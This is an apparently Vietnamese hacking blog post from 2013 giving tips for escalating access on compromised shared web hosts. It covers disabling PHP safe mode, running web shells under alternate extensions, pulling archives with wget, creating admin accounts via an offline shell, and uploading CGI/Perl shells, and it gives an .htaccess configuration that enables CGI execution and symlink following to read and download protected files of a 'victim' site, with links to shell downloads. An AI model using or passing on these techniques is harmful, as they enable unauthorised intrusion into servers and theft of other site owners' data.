Tổng Hợp Và Chia Sẽ Những Kinh Nghiệm Hacking: 1 Số Khó Khăn Khi Local

1 Số Khó Khăn Khi Local
_Get root không thể tạo shbd ,thì lấy shbd của server nào tạo trước đó zip lại rồi up lên (By pass ./shbd chmod 777 )
_Hạ safe on thành safe off (ini.php +php.ini)

http://www.mediafire.com/?27w93ta8n6a8t8v

_ Admin Finder (tìm thư mục admin)

http://www.mediafire.com/?skaysiedncckx4k

Không chạy shell.php thì chạy shell.php3 ,shell.php4
hoặc chạy

http://ip/~user/path/shell.php

~> trường hợp này có khi biến safe on -> off
_Không thể up file.php ,chỉ có thể wget "http://path/file.zip"
Dùng lệnh

-unzip file.zip

Dùng file giải nén
Unzip.php (giải nén các file bị zip)

http://www.mediafire.com/?1bhs7jmvly3e1b4

Con shell này tạo ra thêm 2 file để thực hiện zip
Nếu ko tạo đc 2 file này thì chúng ta sẽ tự tạo 2 file đó

http://www.mediafire.com/?ims0mlwa9e3yzl1

_Không thể truy vấn sql tạo acc admin
Shell offline.php?acc ~> get user admin ,nhiều chức năng ,ko bị lổi trên các server config kỉ

http://www.mediafire.com/?r19m52itzq71x5z

_Không thể up perl shell

http://www.mediafire.com/?5ngshkgxu7q0dm2 (ha version php+up shell cgi.zip)

_File chmod 400 không thể view
+ Chỉnh sửa .htaccess cùng thư mục chứa file symljnk

Options +FollowSymLinks +Indexes
DirectoryIndex default.html
## START ##
Options +ExecCGI
AddHandler cgi-script cgi pl tg love h4 tgb cbg

RewriteEngine on
RewriteRule (.*)\.war$ $1.cgi
## END ##
RemoveHandler .vkl
AddType application/octet-stream .vkl

~> 2 dòng cuối khi symljnk ghi vào file.vkl thì file này load trên trình duyệt sẽ tự download về .Hoặc để file.php khi direct admin dùng IDM download toàn bộ website Victim

Tổng Hợp Và Chia Sẽ Những Kinh Nghiệm Hacking

Thứ Sáu, 24 tháng 5, 2013

1 Số Khó Khăn Khi Local

Không có nhận xét nào:

Đăng nhận xét

VôHình95